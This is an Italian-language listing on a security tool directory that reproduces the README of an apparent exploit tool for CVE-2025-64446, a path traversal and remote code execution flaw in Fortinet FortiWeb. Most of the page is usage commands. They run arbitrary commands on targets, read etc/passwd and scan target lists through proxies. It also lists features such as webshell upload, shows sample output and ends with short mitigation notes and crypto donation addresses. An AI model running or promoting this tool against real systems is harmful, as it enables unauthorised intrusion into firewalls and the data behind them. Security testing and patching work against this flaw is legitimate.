Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2025-64446-fortiweb-exploit — Strumento di ricerca sulla sicurezza per rilevare e testare CVE-2025-64446 (vulnerabilità RCE di Path Traversal di FortiWeb) | Kitploit
Strumenti/GitHubGitHub/an5i/cve-2025-64446-fortiweb-exploit
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e FormazioneSviluppo Payload

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHub
an5i/cve-2025-64446-fortiweb-exploit

cve-2025-64446-fortiweb-exploit

Strumento di ricerca sulla sicurezza per rilevare e testare CVE-2025-64446 (vulnerabilità RCE di Path Traversal di FortiWeb)

Vedi Repository
1119 mesi faNon ancora revisionato
Condividi

CVE-2025-64446 Fortinet FortiWeb Exploit di Path Traversal RCE

Uno strumento di ricerca sulla sicurezza per rilevare e testare la vulnerabilità CVE-2025-64446 in Fortinet FortiWeb Web Application Firewall (WAF). Questa vulnerabilità critica zero-day di path traversal è stata attivamente sfruttata in natura e consente a utenti malintenzionati non autenticati di bypassare i controlli di sicurezza ed eseguire codice arbitrario.

⚠️ Dichiarazione di non responsabilità

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi educativi. L'accesso non autorizzato a sistemi informatici è illegale. Utilizzare questo strumento solo su sistemi di cui si è proprietari o per i quali si dispone di autorizzazione scritta esplicita per il test.

📋 Panoramica

CVE-2025-64446 è una vulnerabilità critica zero-day di path traversal in Fortinet FortiWeb WAF che è stata attivamente sfruttata in natura. Questa vulnerabilità consente a utenti malintenzionati non autenticati di bypassare i controlli di sicurezza tramite attacchi di path traversal, potenzialmente portando all'esecuzione remota di codice, all'accesso a file di configurazione e al compromesso completo del sistema.

Punteggio CVSS: 9.8 (Critico)
Stato: Attivamente sfruttato in natura
CISA KEV: Aggiunto al catalogo delle vulnerabilità note sfruttate
Patch: FG-IR-25-910
Prodotto affetto: Fortinet FortiWeb WAF

🔍 Caratteristiche

  • Rilevamento automatico di FortiWeb: Identifica le implementazioni di FortiWeb WAF
  • Test di Path Traversal: Testa molteplici variazioni di payload di path traversal
  • Conferma della vulnerabilità: Verifica la vulnerabilità CVE-2025-64446
  • Accesso ai file di configurazione: Tenta di leggere i file di configurazione di FortiWeb
  • Distribuzione di webshell: Dimostra la capacità di caricare webshell
  • Esecuzione di comandi: Esegue comandi arbitrari (per test autorizzati)
  • Supporto multi-threading: Scansiona più target in parallelo
  • Supporto proxy: Bypassa ulteriori restrizioni di sicurezza
  • Esportazione JSON: Risultati dettagliati in formato JSON
  • Script POC incluso: Dimostrazione di proof-of-concept semplice

📦 Installazione

Prerequisiti

  • Python 3.6 o superiore
  • pip (gestore pacchetti Python)

Installazione rapida

root@kitploit:~
# Clona il repository
git clone https://github.com/AN5I/cve-2025-64446-fortiweb-exploit.git
cd cve-2025-64446-fortiweb-exploit

# Installa le dipendenze
pip install -r requirements.txt

# Rendi gli script eseguibili (opzionale)
chmod +x cve_2025_64446_fortiweb_exploit.py
chmod +x cve_2025_64446_poc.py

Alternativa: Download diretto

root@kitploit:~
# Scarica gli script
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_fortiweb_exploit.py
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_poc.py

# Installa le dipendenze
pip install requests

🚀 Utilizzo

Utilizzo base

root@kitploit:~
# Singolo target
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com

# Esegui comando personalizzato
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -c "whoami"

# Multipli target da file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

# Con threading per scansione più veloce
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -t 5

# Output verbose per debugging
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -v

Utilizzo dei proxy

root@kitploit:~
# Proxy singolo
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com --proxy http://proxy:port

# Multipli proxy da file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

Script POC

root@kitploit:~
# Test POC base
python3 cve_2025_64446_poc.py -u http://target.com

# Test file specifico
python3 cve_2025_64446_poc.py -u http://target.com -f etc/passwd

# Output verbose
python3 cve_2025_64446_poc.py -u http://target.com -v

Opzioni della riga di comando

root@kitploit:~
-u, --url          URL del target
-f, --file         File contenente URL dei target (uno per riga)
-c, --command      Comando da eseguire (default: id)
-t, --threads      Numero di thread (default: 1)
-o, --output       File di output (default: uknf_fortiweb_results.json)
-v, --verbose      Abilita logging verbose
--proxy            URL del proxy (es., http://127.0.0.1:8080)
--proxy-list       File contenente URL dei proxy (uno per riga)

📊 Output

Lo script genera un file JSON con risultati dettagliati:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-21T00:25:40.123456",
  "fortiweb_detected": true,
  "vulnerable": true,
  "path_traversal_successful": true,
  "config_file_read": true,
  "webshell_uploaded": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_payload": "../../../../etc/passwd"
}

🔬 Come funziona

  1. Fase di rilevamento: Scansiona gli indicatori di FortiWeb WAF (header, contenuto, pagine di errore)
  2. Test della vulnerabilità: Testa molteplici variazioni di payload di path traversal
  3. Conferma del path traversal: Verifica l'accesso riuscito ai file
  4. Accesso alla configurazione: Tenta di leggere i file di configurazione di FortiWeb
  5. Sfruttamento: Se vulnerabile, dimostra la capacità di RCE tramite distribuzione di webshell

🛡️ Mitigazione

Se stai utilizzando FortiWeb WAF:

  1. Applicare immediatamente gli aggiornamenti di sicurezza:

    root@kitploit:~
    # Controlla la versione corrente
    show system status
    
    # Aggiorna all'ultima versione
    execute upgrade <firmware-file>
    
    • Riferimento: FG-IR-25-910
  2. Segmentazione di rete:

    • Limitare l'accesso all'interfaccia di gestione di FortiWeb
    • Implementare ACL di rete
    • Utilizzare VPN per l'accesso amministrativo
  3. Indurimento della configurazione:

    • Disattivare funzionalità non necessarie
    • Implementare controlli di accesso rigorosi
    • Abilitare logging e monitoraggio completi
  4. Requisiti CISA:

    • Le agenzie federali devono applicare la patch entro 7 giorni
    • Monitorare il catalogo CISA KEV per aggiornamenti

📚 Riferimenti

  • CVE: CVE-2025-64446
  • Fortinet PSIRT: FG-IR-25-910
  • Catalogo CISA KEV: CVE-2025-64446
  • Blog Tenable: Analisi CVE-2025-64446

📖 Esempi

Esempio 1: Scansione singolo target

root@kitploit:~
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com

Esempio 2: Multipli target con output

root@kitploit:~
# Crea file dei target
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Esegui scansione
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

Esempio 3: Esecuzione comando personalizzato

root@kitploit:~
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com -c "uname -a"

Esempio 4: Utilizzo proxy

root@kitploit:~
# Proxy singolo
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# Multipli proxy da file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

Esempio 5: Test POC

root@kitploit:~
# POC base
python3 cve_2025_64446_poc.py -u https://example.com

# Test file specifico
python3 cve_2025_64446_poc.py -u https://example.com -f etc/passwd

🤝 Contributi

I contributi sono benvenuti! Sentiti libero di inviare una Pull Request.

  1. Fai il fork del repository
  2. Crea il tuo branch delle funzionalità (git checkout -b feature/AmazingFeature)
  3. Esegui il commit delle tue modifiche (git commit -m 'Add some AmazingFeature')
  4. Invia il push al branch (git push origin feature/AmazingFeature)
  5. Apri una Pull Request

🐛 Problemi

Se incontri problemi o hai suggerimenti, apri un issue su GitHub.

📝 Licenza

Questo progetto è concesso in licenza MIT - vedi il file LICENSE per i dettagli.

⭐ Cronologia stelle

Se trovi utile questo strumento, considera di dargli una stella su GitHub!

⚖️ Aspetti legali

Questo strumento è fornito esclusivamente per scopi educativi e test di sicurezza autorizzati. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo programma. Gli utenti sono responsabili di assicurarsi di avere la dovuta autorizzazione prima di testare qualsiasi sistema.

🙏 Riconoscimenti

  • Reporter originale della vulnerabilità e ricercatori di sicurezza
  • Fortinet PSIRT per la divulgazione della vulnerabilità
  • CISA per il mantenimento del catalogo KEV
  • Comunità di sicurezza per la ricerca in corso

💰 Donazioni

Se trovi utile questo strumento e desideri supportare il progetto:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

Grazie per il tuo supporto! 🙏

Scarica lo strumento